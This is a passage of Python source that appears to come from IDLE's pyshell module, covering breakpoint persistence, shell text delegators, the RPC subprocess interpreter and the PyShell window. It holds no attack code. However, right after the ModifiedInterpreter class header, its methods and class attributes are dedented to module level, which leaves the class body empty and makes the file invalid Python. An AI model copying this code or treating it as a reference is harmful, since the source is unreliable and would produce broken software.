                debug.clear_file_breaks(filename)
            except:
                pass

    def store_file_breaks(self):
        "Save breakpoints when file is saved"
        # XXX 13 Dec 2002 KBK Currently the file must be saved before it can
        #     be run.  The breaks are saved at that time.  If we introduce
        #     a temporary file save feature the save breaks functionality
        #     needs to be re-verified, since the breaks at the time the
        #     temp file is created may differ from the breaks at the last
        #     permanent save of the file.  Currently, a break introduced
        #     after a save will be effective, but not persistent.
        #     This is necessary to keep the saved breaks synched with the
        #     saved file.
        #
        #     Breakpoints are set as tagged ranges in the text.
        #     Since a modified file has to be saved before it is
        #     run, and since self.breakpoints (from which the subprocess
        #     debugger is loaded) is updated during the save, the visible
        #     breaks stay synched with the subprocess even if one of these
        #     unexpected breakpoint deletions occurs.
        breaks = self.breakpoints
        filename = self.io.filename
        try:
            with open(self.breakpointPath, "r") as fp:
                lines = fp.readlines()
        except OSError:
            lines = []
        try:
            # Rewrite the whole file, replacing this file's entry (if any).
            with open(self.breakpointPath, "w") as new_file:
                for line in lines:
                    if not line.startswith(filename + '='):
                        new_file.write(line)
                self.update_breakpoints()
                breaks = self.breakpoints
                if breaks:
                    new_file.write(filename + '=' + str(breaks) + '\n')
        except OSError as err:
            # Only nag the user once per session about an unwritable list.
            if not getattr(self.root, "breakpoint_error_displayed", False):
                self.root.breakpoint_error_displayed = True
                tkMessageBox.showerror(title='IDLE Error',
                                       message='Unable to update breakpoint list:\n%s'
                                       % str(err),
                                       parent=self.text)

    def restore_file_breaks(self):
        self.text.update()   # this enables setting "BREAK" tags to be visible
        if self.io is None:
            # can happen if IDLE closes due to the .update() call
            return
        filename = self.io.filename
        if filename is None:
            return
        if os.path.isfile(self.breakpointPath):
            with open(self.breakpointPath, "r") as fp:
                lines = fp.readlines()
            for line in lines:
                if line.startswith(filename + '='):
                    # NOTE(review): eval() on the stored list trusts the
                    # contents of the user's .idlerc breakpoint file.
                    breakpoint_linenumbers = eval(line[len(filename)+1:])
                    for breakpoint_linenumber in breakpoint_linenumbers:
                        self.set_breakpoint(breakpoint_linenumber)

    def update_breakpoints(self):
        "Retrieves all the breakpoints in the current window"
        text = self.text
        ranges = text.tag_ranges("BREAK")
        linenumber_list = self.ranges_to_linenumbers(ranges)
        self.breakpoints = linenumber_list

    def ranges_to_linenumbers(self, ranges):
        """Convert (start, stop) BREAK tag index pairs to line numbers."""
        lines = []
        for index in range(0, len(ranges), 2):
            lineno = int(float(ranges[index].string))
            end = int(float(ranges[index+1].string))
            while lineno < end:
                lines.append(lineno)
                lineno += 1
        return lines

    # XXX 13 Dec 2002 KBK Not used currently
    #     def saved_change_hook(self):
    #         "Extend base method - clear breaks if module is modified"
    #         if not self.get_saved():
    #             self.clear_file_breaks()
    #         EditorWindow.saved_change_hook(self)

    def _close(self):
        "Extend base method - clear breaks when module is closed"
        self.clear_file_breaks()
        EditorWindow._close(self)
class PyShellFileList(FileList):
    "Extend base class: IDLE supports a shell and breakpoints"

    # New edit windows come up as PyShellEditorWindow instead of the
    # plain EditorWindow used by the base FileList.
    EditorWindow = PyShellEditorWindow

    pyshell = None

    def open_shell(self, event=None):
        """Raise the existing shell window, or create and start one."""
        if self.pyshell:
            self.pyshell.top.wakeup()
            return self.pyshell
        self.pyshell = PyShell(self)
        if self.pyshell and not self.pyshell.begin():
            return None
        return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
    "Extend base class: colorizer for the shell window itself"

    def __init__(self):
        ColorDelegator.__init__(self)
        self.LoadTagDefs()

    def recolorize_main(self):
        # Text before the I/O mark is final output; flag it SYNC so the
        # base recolorizer leaves it alone.
        self.tag_remove("TODO", "1.0", "iomark")
        self.tag_add("SYNC", "1.0", "iomark")
        ColorDelegator.recolorize_main(self)

    def LoadTagDefs(self):
        ColorDelegator.LoadTagDefs(self)
        theme = idleConf.CurrentTheme()
        shell_tags = {
            "stdin": {'background': None, 'foreground': None},
            "stdout": idleConf.GetHighlight(theme, "stdout"),
            "stderr": idleConf.GetHighlight(theme, "stderr"),
            "console": idleConf.GetHighlight(theme, "console"),
        }
        self.tagdefs.update(shell_tags)

    def removecolors(self):
        # Don't remove shell color tags before "iomark"
        for tag in self.tagdefs:
            self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
    "Extend base class: forbid insert/delete before the I/O mark"

    def _blocked(self, index):
        # True when index lies before the I/O mark; rings the bell then.
        try:
            if self.delegate.compare(index, "<", "iomark"):
                self.delegate.bell()
                return True
        except TclError:
            pass
        return False

    def insert(self, index, chars, tags=None):
        if not self._blocked(index):
            UndoDelegator.insert(self, index, chars, tags)

    def delete(self, index1, index2=None):
        if not self._blocked(index1):
            UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):

    def handle_EOF(self):
        """Re-raise EOFError instead of letting the base class handle it."""
        raise EOFError
def restart_line(width, filename):  # See bpo-38141.
    """Return width long restart line formatted with filename.

    Fill line with balanced '='s, with any extras and at least one at
    the beginning. Do not end with a trailing space.
    """
    tag = f"= RESTART: {filename or 'Shell'} ="
    if len(tag) > width:
        return tag[:-2]  # Drop the trailing ' ='.
    pad, extra = divmod(width - len(tag), 2)
    return "=" * (pad + extra) + tag + "=" * pad
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
    """Bind the interpreter to its shell window and seed runtime state."""
    self.tkconsole = tkconsole
    # Execute user code in __main__'s namespace, like the regular REPL.
    main_namespace = sys.modules['__main__'].__dict__
    InteractiveInterpreter.__init__(self, locals=main_namespace)
    self.restarting = False
    self.subprocess_arglist = None
    self.port = PORT
    self.original_compiler_flags = self.compile.compiler.flags
# Handle for the scheduled text.after() poll; cancelled in kill_subprocess.
_afterid = None
# RPC client once the subprocess connection is up; reset to None on kill.
rpcclt = None
# Popen handle for the spawned execution server; set in spawn_subprocess.
rpcsubproc = None
def spawn_subprocess(self):
    """Launch the Python execution server as a child process."""
    args = self.subprocess_arglist
    if args is None:
        # Build the argv lazily, once, and keep it for restarts.
        args = self.subprocess_arglist = self.build_subprocess_arglist()
    self.rpcsubproc = subprocess.Popen(args)
def build_subprocess_arglist(self):
    """Compose argv for launching idlelib.run in a child interpreter."""
    assert (self.port != 0), (
        "Socket should have been assigned a port number.")
    warn_args = ['-W' + s for s in sys.warnoptions]
    # Maybe IDLE is installed and is being accessed via sys.path,
    # or maybe it's not installed and the idle.py script is being
    # run from the IDLE source directory.
    del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
                                   default=False, type='bool')
    command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
    return [sys.executable] + warn_args + ["-c", command, str(self.port)]
def start_subprocess(self):
    """Open the RPC listener, spawn the execution server and connect.

    Returns the connected RPC client, or None (after an error dialog)
    when the socket cannot be bound or the subprocess never connects.
    """
    addr = (HOST, self.port)
    # GUI makes several attempts to acquire socket, listens for connection
    for i in range(3):
        time.sleep(i)
        try:
            self.rpcclt = MyRPCClient(addr)
            break
        except OSError:
            pass
    else:
        self.display_port_binding_error()
        return None
    # if PORT was 0, system will assign an 'ephemeral' port. Find it out:
    self.port = self.rpcclt.listening_sock.getsockname()[1]
    # if PORT was not 0, probably working with a remote execution server
    if PORT != 0:
        # To allow reconnection within the 2MSL wait (cf. Stevens TCP
        # V1, 18.6), set SO_REUSEADDR.  Note that this can be problematic
        # on Windows since the implementation allows two active sockets on
        # the same address!
        self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
                                              socket.SO_REUSEADDR, 1)
    self.spawn_subprocess()
    #time.sleep(20) # test to simulate GUI not accepting connection
    # Accept the connection from the Python execution server
    self.rpcclt.listening_sock.settimeout(10)
    try:
        self.rpcclt.accept()
    except socket.timeout:
        self.display_no_subprocess_error()
        return None
    # Expose the GUI-side objects the execution server will call back into.
    self.rpcclt.register("console", self.tkconsole)
    self.rpcclt.register("stdin", self.tkconsole.stdin)
    self.rpcclt.register("stdout", self.tkconsole.stdout)
    self.rpcclt.register("stderr", self.tkconsole.stderr)
    self.rpcclt.register("flist", self.tkconsole.flist)
    self.rpcclt.register("linecache", linecache)
    self.rpcclt.register("interp", self)
    self.transfer_path(with_cwd=True)
    self.poll_subprocess()
    return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
    """Kill the execution server and bring up a fresh one.

    Re-entrant calls while a restart is in flight return the current
    RPC client immediately.  Returns None when the new subprocess
    never connects.
    """
    if self.restarting:
        return self.rpcclt
    self.restarting = True
    # close only the subprocess debugger
    debug = self.getdebugger()
    if debug:
        try:
            # Only close subprocess debugger, don't unregister gui_adap!
            debugger_r.close_subprocess_debugger(self.rpcclt)
        except:
            pass
    # Kill subprocess, spawn a new one, accept connection.
    self.rpcclt.close()
    self.terminate_subprocess()
    console = self.tkconsole
    was_executing = console.executing
    console.executing = False
    self.spawn_subprocess()
    try:
        self.rpcclt.accept()
    except socket.timeout:
        self.display_no_subprocess_error()
        return None
    self.transfer_path(with_cwd=with_cwd)
    console.stop_readline()
    # annotate restart in shell window and mark it
    console.text.delete("iomark", "end-1c")
    console.write('\n')
    console.write(restart_line(console.width, filename))
    console.text.mark_set("restart", "end-1c")
    console.text.mark_gravity("restart", "left")
    if not filename:
        console.showprompt()
    # restart subprocess debugger
    if debug:
        # Restarted debugger connects to current instance of debug GUI
        debugger_r.restart_subprocess_debugger(self.rpcclt)
        # reload remote debugger breakpoints for all PyShellEditWindows
        debug.load_breakpoints()
    self.compile.compiler.flags = self.original_compiler_flags
    self.restarting = False
    return self.rpcclt
def __request_interrupt(self):
    """Blocking RPC asking the execution server to raise KeyboardInterrupt."""
    self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
    """Interrupt the subprocess from a worker thread so the GUI stays live."""
    threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
    """Cancel polling, tear down the RPC link, and kill the subprocess."""
    if self._afterid is not None:
        # Stop the scheduled poll_subprocess callback.
        self.tkconsole.text.after_cancel(self._afterid)
    try:
        self.rpcclt.listening_sock.close()
    except AttributeError:  # no socket
        pass
    try:
        self.rpcclt.close()
    except AttributeError:  # no socket
        pass
    self.terminate_subprocess()
    self.tkconsole.executing = False
    self.rpcclt = None
def terminate_subprocess(self):
    """Ensure the spawned execution-server process is dead and reaped.

    Best-effort: an OSError from kill() or wait() means the process is
    already gone, which is the desired end state anyway.
    """
    try:
        self.rpcsubproc.kill()
        self.rpcsubproc.wait()
    except OSError:
        # Process already terminated (or vanished while being reaped).
        return
def transfer_path(self, with_cwd=False):
    """Copy this process's sys.path into the subprocess.

    When with_cwd is true (fresh start / restart), '' is prepended so
    the subprocess also searches the current working directory.
    """
    if with_cwd:        # Issue 13506
        path = ['']     # include Current Working Directory
        path.extend(sys.path)
    else:
        path = sys.path
    self.runcommand("""if 1:
        import sys as _sys
        _sys.path = %r
        del _sys
        \n""" % (path,))

# Sequence number of the currently executing async RPC request, if any.
active_seq = None
def poll_subprocess(self):
    """Poll the RPC link for a response from the execution server.

    Handles normal results ("OK"), remote exceptions and protocol
    errors, restarts the subprocess on a lost connection, and
    reschedules itself on the Tk event loop while the shell is open.
    """
    clt = self.rpcclt
    if clt is None:
        return
    try:
        response = clt.pollresponse(self.active_seq, wait=0.05)
    except (EOFError, OSError, KeyboardInterrupt):
        # lost connection or subprocess terminated itself, restart
        # [the KBI is from rpc.SocketIO.handle_EOF()]
        if self.tkconsole.closing:
            return
        response = None
        self.restart_subprocess()
    if response:
        self.tkconsole.resetoutput()
        self.active_seq = None
        how, what = response
        console = self.tkconsole.console
        if how == "OK":
            if what is not None:
                print(repr(what), file=console)
        elif how == "EXCEPTION":
            if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
                self.remote_stack_viewer()
        elif how == "ERROR":
            errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
            print(errmsg, what, file=sys.__stderr__)
            print(errmsg, what, file=console)
        # we received a response to the currently active seq number:
        try:
            self.tkconsole.endexecuting()
        except AttributeError:  # shell may have closed
            pass
    # Reschedule myself
    if not self.tkconsole.closing:
        self._afterid = self.tkconsole.text.after(
            self.tkconsole.pollinterval, self.poll_subprocess)
# Active debugger (remote proxy or local Debugger), or None when idle.
debugger = None

def setdebugger(self, debugger):
    """Install *debugger* as the active debugger (None to disable)."""
    self.debugger = debugger

def getdebugger(self):
    """Return the active debugger, or None when not debugging."""
    return self.debugger
def open_remote_stack_viewer(self):
    """Initiate the remote stack viewer from a separate thread.

    This method is called from the subprocess, and by returning from this
    method we allow the subprocess to unblock.  After a bit the shell
    requests the subprocess to open the remote stack viewer which returns a
    static object looking at the last exception.  It is queried through
    the RPC mechanism.
    """
    self.tkconsole.text.after(300, self.remote_stack_viewer)
    return
def remote_stack_viewer(self):
    """Open a tree window browsing the subprocess's last traceback."""
    from idlelib import debugobj_r
    oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
    if oid is None:
        # No traceback available in the subprocess; just beep.
        self.tkconsole.root.bell()
        return
    item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
    from idlelib.tree import ScrolledCanvas, TreeNode
    top = Toplevel(self.tkconsole.root)
    theme = idleConf.CurrentTheme()
    background = idleConf.GetHighlight(theme, 'normal')['background']
    sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
    sc.frame.pack(expand=1, fill="both")
    node = TreeNode(sc.canvas, None, item)
    node.expand()
    # XXX Should GC the remote tree when closing the window

# Counter used to generate unique "<pyshell#N>" pseudofile names.
gid = 0
def execsource(self, source):
    "Like runsource() but assumes complete exec source"
    filename = self.stuffsource(source)
    self.execfile(filename, source)
def execfile(self, filename, source=None):
    "Execute an existing file"
    if source is None:
        # tokenize.open honors the file's PEP 263 encoding declaration.
        with tokenize.open(filename) as fp:
            source = fp.read()
        if use_subprocess:
            # Define __file__ in the subprocess namespace for the run,
            # then remove it again afterwards.
            source = (f"__file__ = r'''{os.path.abspath(filename)}'''\n"
                      + source + "\ndel __file__")
    try:
        code = compile(source, filename, "exec")
    except (OverflowError, SyntaxError):
        self.tkconsole.resetoutput()
        print('*** Error in script or command!\n'
              'Traceback (most recent call last):',
              file=self.tkconsole.stderr)
        InteractiveInterpreter.showsyntaxerror(self, filename)
        self.tkconsole.showprompt()
    else:
        self.runcode(code)
def runsource(self, source):
    "Extend base class method: Stuff the source in the line cache first"
    filename = self.stuffsource(source)
    # at the moment, InteractiveInterpreter expects str
    assert isinstance(source, str)
    # InteractiveInterpreter.runsource() calls its runcode() method,
    # which is overridden (see below)
    return InteractiveInterpreter.runsource(self, source, filename)
def stuffsource(self, source):
    """Register *source* in the linecache under a synthetic shell filename.

    Returns the generated "<pyshell#N>" pseudofile name so tracebacks
    can resolve shell-input lines.
    """
    pseudofile = "<pyshell#%d>" % self.gid
    self.gid += 1
    linecache.cache[pseudofile] = (
        len(source) + 1,        # size
        0,                      # mtime placeholder
        source.split("\n"),     # lines
        pseudofile,             # fullname
    )
    return pseudofile
def prepend_syspath(self, filename):
    "Prepend sys.path with file's directory if not already included"
    # Executed in the subprocess; temporaries are deleted to avoid
    # polluting the user namespace.
    self.runcommand("""if 1:
        _filename = %r
        import sys as _sys
        from os.path import dirname as _dirname
        _dir = _dirname(_filename)
        if not _dir in _sys.path:
            _sys.path.insert(0, _dir)
        del _filename, _sys, _dirname, _dir
        \n""" % (filename,))
def showsyntaxerror(self, filename=None):
    """Override Interactive Interpreter method: Use Colorizing

    Color the offending position instead of printing it and pointing at it
    with a caret.
    """
    tkconsole = self.tkconsole
    text = tkconsole.text
    text.tag_remove("ERROR", "1.0", "end")
    type, value, tb = sys.exc_info()
    msg = getattr(value, 'msg', '') or value or "<no detail available>"
    lineno = getattr(value, 'lineno', '') or 1
    offset = getattr(value, 'offset', '') or 0
    if offset == 0:
        lineno += 1  # mark end of offending line
    # Translate (lineno, offset) within the input into a Text index
    # relative to the I/O mark where the input started.
    if lineno == 1:
        pos = "iomark + %d chars" % (offset-1)
    else:
        pos = "iomark linestart + %d lines + %d chars" % \
              (lineno-1, offset-1)
    tkconsole.colorize_syntax_error(text, pos)
    tkconsole.resetoutput()
    self.write("SyntaxError: %s\n" % msg)
    tkconsole.showprompt()
def showtraceback(self):
    "Extend base class method to reset output properly"
    self.tkconsole.resetoutput()
    # Drop stale non-shell linecache entries before formatting.
    self.checklinecache()
    InteractiveInterpreter.showtraceback(self)
    if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
        self.tkconsole.open_stack_viewer()
def checklinecache(self):
    """Drop every linecache entry except "<pyshell#N>"-style pseudofiles."""
    cache = linecache.cache
    stale = [name for name in cache if name[:1] + name[-1:] != "<>"]
    for name in stale:
        del cache[name]
def runcommand(self, code):
    "Run the code without invoking the debugger"
    # The code better not raise an exception!
    if self.tkconsole.executing:
        self.display_executing_dialog()
        return 0
    if self.rpcclt:
        # Queue for execution in the subprocess.
        self.rpcclt.remotequeue("exec", "runcode", (code,), {})
    else:
        # No subprocess: run directly in this process.
        exec(code, self.locals)
    return 1
def runcode(self, code):
    """Override base class method

    Dispatch *code* to the subprocess, the debugger, or a local exec(),
    and route SystemExit / KeyboardInterrupt / other exceptions to the
    shell window instead of letting them kill IDLE.
    """
    if self.tkconsole.executing:
        # Previous command still running: force a clean restart first.
        self.restart_subprocess()
    self.checklinecache()
    debugger = self.debugger
    try:
        self.tkconsole.beginexecuting()
        if not debugger and self.rpcclt is not None:
            # Asynchronous remote execution; poll_subprocess collects it.
            self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
                                                     (code,), {})
        elif debugger:
            debugger.run(code, self.locals)
        else:
            exec(code, self.locals)
    except SystemExit:
        if not self.tkconsole.closing:
            if tkMessageBox.askyesno(
                    "Exit?",
                    "Do you want to exit altogether?",
                    default="yes",
                    parent=self.tkconsole.text):
                raise
            else:
                self.showtraceback()
        else:
            raise
    except:
        if use_subprocess:
            print("IDLE internal error in runcode()",
                  file=self.tkconsole.stderr)
            self.showtraceback()
            self.tkconsole.endexecuting()
        else:
            if self.tkconsole.canceled:
                self.tkconsole.canceled = False
                print("KeyboardInterrupt", file=self.tkconsole.stderr)
            else:
                self.showtraceback()
    finally:
        if not use_subprocess:
            try:
                self.tkconsole.endexecuting()
            except AttributeError:  # shell may have closed
                pass
def write(self, s):
    "Override base class method"
    # Interpreter output (e.g. tracebacks) goes to the shell's stderr.
    return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
    """Report failure to bind the TCP/IP port used for the subprocess."""
    tkMessageBox.showerror(
        "Port Binding Error",
        "IDLE can't bind to a TCP/IP port, which is necessary to "
        "communicate with its Python execution server.  This might be "
        "because no networking is installed on this computer.  "
        "Run IDLE with the -n command line switch to start without a "
        "subprocess and refer to Help/IDLE Help 'Running without a "
        "subprocess' for further details.",
        parent=self.tkconsole.text)
def display_no_subprocess_error(self):
    """Report that the spawned subprocess never connected back."""
    tkMessageBox.showerror(
        "Subprocess Connection Error",
        "IDLE's subprocess didn't make connection.\n"
        "See the 'Startup failure' section of the IDLE doc, online at\n"
        "https://docs.python.org/3/library/idle.html#startup-failure",
        parent=self.tkconsole.text)
def display_executing_dialog(self):
    """Tell the user a command is already running in the shell."""
    tkMessageBox.showerror(
        "Already executing",
        "The Python Shell window is already executing a command; "
        "please wait until it is finished.",
        parent=self.tkconsole.text)
class PyShell(OutputWindow):
    """The interactive Python shell window.

    Extends OutputWindow with prompt handling, input editing, command
    history, and a ModifiedInterpreter that runs user code (normally in
    a subprocess over RPC).
    """

    shell_title = "IDLE Shell " + python_version()

    # Override classes
    ColorDelegator = ModifiedColorDelegator
    UndoDelegator = ModifiedUndoDelegator

    # Override menus
    menu_specs = [
        ("file", "_File"),
        ("edit", "_Edit"),
        ("debug", "_Debug"),
        ("options", "_Options"),
        ("window", "_Window"),
        ("help", "_Help"),
    ]

    # Extend right-click context menu
    rmenu_specs = OutputWindow.rmenu_specs + [
        ("Squeeze", "<<squeeze-current-text>>"),
    ]
    allow_line_numbers = False

    # New classes
    from idlelib.history import History

    def __init__(self, flist=None):
        if use_subprocess:
            # Insert the Shell menu (restart etc.) once, before Debug.
            ms = self.menu_specs
            if ms[2][0] != "shell":
                ms.insert(2, ("shell", "She_ll"))
        self.interp = ModifiedInterpreter(self)
        if flist is None:
            # Standalone shell: build a private Tk root and file list.
            root = Tk()
            fixwordbreaks(root)
            root.withdraw()
            flist = PyShellFileList(root)

        OutputWindow.__init__(self, flist, None, None)

        self.usetabs = True
        # indentwidth must be 8 when using tabs.  See note in EditorWindow:
        self.indentwidth = 8

        self.sys_ps1 = sys.ps1 if hasattr(sys, 'ps1') else '>>> '
        self.prompt_last_line = self.sys_ps1.split('\n')[-1]
        self.prompt = self.sys_ps1  # Changes when debug active

        text = self.text
        text.configure(wrap="char")
        text.bind("<<newline-and-indent>>", self.enter_callback)
        text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
        text.bind("<<interrupt-execution>>", self.cancel_callback)
        text.bind("<<end-of-file>>", self.eof_callback)
        text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
        text.bind("<<toggle-debugger>>", self.toggle_debugger)
        text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
        if use_subprocess:
            text.bind("<<view-restart>>", self.view_restart_mark)
            text.bind("<<restart-shell>>", self.restart_shell)
        squeezer = self.Squeezer(self)
        text.bind("<<squeeze-current-text>>",
                  squeezer.squeeze_current_text_event)

        # Save the original std streams so _close() can restore them.
        self.save_stdout = sys.stdout
        self.save_stderr = sys.stderr
        self.save_stdin = sys.stdin
        from idlelib import iomenu
        self.stdin = StdInputFile(self, "stdin",
                                  iomenu.encoding, iomenu.errors)
        self.stdout = StdOutputFile(self, "stdout",
                                    iomenu.encoding, iomenu.errors)
        self.stderr = StdOutputFile(self, "stderr",
                                    iomenu.encoding, "backslashreplace")
        self.console = StdOutputFile(self, "console",
                                     iomenu.encoding, iomenu.errors)
        if not use_subprocess:
            sys.stdout = self.stdout
            sys.stderr = self.stderr
            sys.stdin = self.stdin
        try:
            # page help() text to shell.
            import pydoc  # import must be done here to capture i/o rebinding.
            # XXX KBK 27Dec07 use text viewer someday, but must work w/o subproc
            pydoc.pager = pydoc.plainpager
        except:
            sys.stderr = sys.__stderr__
            raise
        #
        self.history = self.History(self.text)
        #
        self.pollinterval = 50  # millisec

    def get_standard_extension_names(self):
        return idleConf.GetExtensions(shell_only=True)

    # Shell state flags (class-level defaults, shadowed per instance).
    reading = False              # inside a nested mainloop serving input()
    executing = False            # user code currently running
    canceled = False             # user requested an interrupt
    endoffile = False            # user signalled EOF for input()
    closing = False              # window shutdown in progress
    _stop_readline_flag = False  # request to abort a pending readline()

    def set_warning_stream(self, stream):
        global warning_stream
        warning_stream = stream

    def get_warning_stream(self):
        return warning_stream

    def toggle_debugger(self, event=None):
        # Refuse to change debugger state while user code is running.
        if self.executing:
            tkMessageBox.showerror("Don't debug now",
                "You can only toggle the debugger when idle",
                parent=self.text)
            self.set_debugger_indicator()
            return "break"
        else:
            db = self.interp.getdebugger()
            if db:
                self.close_debugger()
            else:
                self.open_debugger()

    def set_debugger_indicator(self):
        # Sync the Debug menu checkbutton with the actual debugger state.
        db = self.interp.getdebugger()
        self.setvar("<<toggle-debugger>>", not not db)

    def toggle_jit_stack_viewer(self, event=None):
        pass  # All we need is the variable

    def close_debugger(self):
        db = self.interp.getdebugger()
        if db:
            self.interp.setdebugger(None)
            db.close()
            if self.interp.rpcclt:
                debugger_r.close_remote_debugger(self.interp.rpcclt)
            self.resetoutput()
            self.console.write("[DEBUG OFF]\n")
            self.prompt = self.sys_ps1
            self.showprompt()
        self.set_debugger_indicator()

    def open_debugger(self):
        if self.interp.rpcclt:
            dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
                                                       self)
        else:
            dbg_gui = debugger.Debugger(self)
        self.interp.setdebugger(dbg_gui)
        dbg_gui.load_breakpoints()
        self.prompt = "[DEBUG ON]\n" + self.sys_ps1
        self.showprompt()
        self.set_debugger_indicator()

    def beginexecuting(self):
        "Helper for ModifiedInterpreter"
        self.resetoutput()
        self.executing = True

    def endexecuting(self):
        "Helper for ModifiedInterpreter"
        self.executing = False
        self.canceled = False
        self.showprompt()

    def close(self):
        "Extend EditorWindow.close()"
        if self.executing:
            response = tkMessageBox.askokcancel(
                "Kill?",
                "Your program is still running!\n Do you want to kill it?",
                default="ok",
                parent=self.text)
            if response is False:
                return "cancel"
        self.stop_readline()
        self.canceled = True
        self.closing = True
        return EditorWindow.close(self)

    def _close(self):
        "Extend EditorWindow._close(), shut down debugger and execution server"
        self.close_debugger()
        if use_subprocess:
            self.interp.kill_subprocess()
        # Restore std streams
        sys.stdout = self.save_stdout
        sys.stderr = self.save_stderr
        sys.stdin = self.save_stdin
        # Break cycles
        self.interp = None
        self.console = None
        self.flist.pyshell = None
        self.history = None
        EditorWindow._close(self)

    def ispythonsource(self, filename):
        "Override EditorWindow method: never remove the colorizer"
        return True

    def short_title(self):
        return self.shell_title

    COPYRIGHT = \
        'Type "help", "copyright", "credits" or "license()" for more information.'

    def begin(self):
        """Print the startup banner and connect to the execution server.

        Returns False (after closing the window) when the subprocess
        could not be started.
        """
        self.text.mark_set("iomark", "insert")
        self.resetoutput()
        if use_subprocess:
            nosub = ''
            client = self.interp.start_subprocess()
            if not client:
                self.close()
                return False
        else:
            nosub = ("==== No Subprocess ====\n\n" +
                     "WARNING: Running IDLE without a Subprocess is deprecated\n" +
                     "and will be removed in a later version. See Help/IDLE Help\n" +
                     "for details.\n\n")
            sys.displayhook = rpc.displayhook

        self.write("Python %s on %s\n%s\n%s" %
                   (sys.version, sys.platform, self.COPYRIGHT, nosub))
        self.text.focus_force()
        self.showprompt()
        import tkinter
        tkinter._default_root = None  # 03Jan04 KBK What's this?
        return True

    def stop_readline(self):
        if not self.reading:  # no nested mainloop to exit.
            return
        self._stop_readline_flag = True
        self.top.quit()

    def readline(self):
        """Serve one line of input() by running a nested Tk mainloop."""
        save = self.reading
        try:
            self.reading = True
            self.top.mainloop()  # nested mainloop()
        finally:
            self.reading = save
        if self._stop_readline_flag:
            self._stop_readline_flag = False
            return ""
        line = self.text.get("iomark", "end-1c")
        if len(line) == 0:  # may be EOF if we quit our mainloop with Ctrl-C
            line = "\n"
        self.resetoutput()
        if self.canceled:
            self.canceled = False
            if not use_subprocess:
                raise KeyboardInterrupt
        if self.endoffile:
            self.endoffile = False
            line = ""
        return line

    def isatty(self):
        return True

    def cancel_callback(self, event=None):
        try:
            if self.text.compare("sel.first", "!=", "sel.last"):
                return  # Active selection -- always use default binding
        except:
            pass
        if not (self.executing or self.reading):
            # Nothing to interrupt: just show a fresh prompt.
            self.resetoutput()
            self.interp.write("KeyboardInterrupt\n")
            self.showprompt()
            return "break"
        self.endoffile = False
        self.canceled = True
        if (self.executing and self.interp.rpcclt):
            if self.interp.getdebugger():
                self.interp.restart_subprocess()
            else:
                self.interp.interrupt_subprocess()
        if self.reading:
            self.top.quit()  # exit the nested mainloop() in readline()
        return "break"

    def eof_callback(self, event):
        if self.executing and not self.reading:
            return  # Let the default binding (delete next char) take over
        if not (self.text.compare("iomark", "==", "insert") and
                self.text.compare("insert", "==", "end-1c")):
            return  # Let the default binding (delete next char) take over
        if not self.executing:
            self.resetoutput()
            self.close()
        else:
            self.canceled = False
            self.endoffile = True
            self.top.quit()
        return "break"

    def linefeed_callback(self, event):
        # Insert a linefeed without entering anything (still autoindented)
        if self.reading:
            self.text.insert("insert", "\n")
            self.text.see("insert")
        else:
            self.newline_and_indent_event(event)
        return "break"

    def enter_callback(self, event):
        """Handle Return: recall old input, edit current input, or submit."""
        if self.executing and not self.reading:
            return  # Let the default binding (insert '\n') take over
        # If some text is selected, recall the selection
        # (but only if this before the I/O mark)
        try:
            sel = self.text.get("sel.first", "sel.last")
            if sel:
                if self.text.compare("sel.last", "<=", "iomark"):
                    self.recall(sel, event)
                    return "break"
        except:
            pass
        # If we're strictly before the line containing iomark, recall
        # the current line, less a leading prompt, less leading or
        # trailing whitespace
        if self.text.compare("insert", "<", "iomark linestart"):
            # Check if there's a relevant stdin range -- if so, use it
            prev = self.text.tag_prevrange("stdin", "insert")
            if prev and self.text.compare("insert", "<", prev[1]):
                self.recall(self.text.get(prev[0], prev[1]), event)
                return "break"
            next = self.text.tag_nextrange("stdin", "insert")
            if next and self.text.compare("insert lineend", ">=", next[0]):
                self.recall(self.text.get(next[0], next[1]), event)
                return "break"
            # No stdin mark -- just get the current line, less any prompt
            indices = self.text.tag_nextrange("console", "insert linestart")
            if indices and \
               self.text.compare(indices[0], "<=", "insert linestart"):
                self.recall(self.text.get(indices[1], "insert lineend"), event)
            else:
                self.recall(self.text.get("insert linestart", "insert lineend"), event)
            return "break"
        # If we're between the beginning of the line and the iomark, i.e.
        # in the prompt area, move to the end of the prompt
        if self.text.compare("insert", "<", "iomark"):
            self.text.mark_set("insert", "iomark")
        # If we're in the current input and there's only whitespace
        # beyond the cursor, erase that whitespace first
        s = self.text.get("insert", "end-1c")
        if s and not s.strip():
            self.text.delete("insert", "end-1c")
        # If we're in the current input before its last line,
        # insert a newline right at the insert point
        if self.text.compare("insert", "<", "end-1c linestart"):
            self.newline_and_indent_event(event)
            return "break"
        # We're in the last line; append a newline and submit it
        self.text.mark_set("insert", "end-1c")
        if self.reading:
            self.text.insert("insert", "\n")
            self.text.see("insert")
        else:
            self.newline_and_indent_event(event)
        self.text.tag_add("stdin", "iomark", "end-1c")
        self.text.update_idletasks()
        if self.reading:
            self.top.quit()  # Break out of recursive mainloop()
        else:
            self.runit()
        return "break"

    def recall(self, s, event):
        """Paste previous input *s* at the prompt, reindented to fit."""
        # remove leading and trailing empty or whitespace lines
        s = re.sub(r'^\s*\n', '', s)
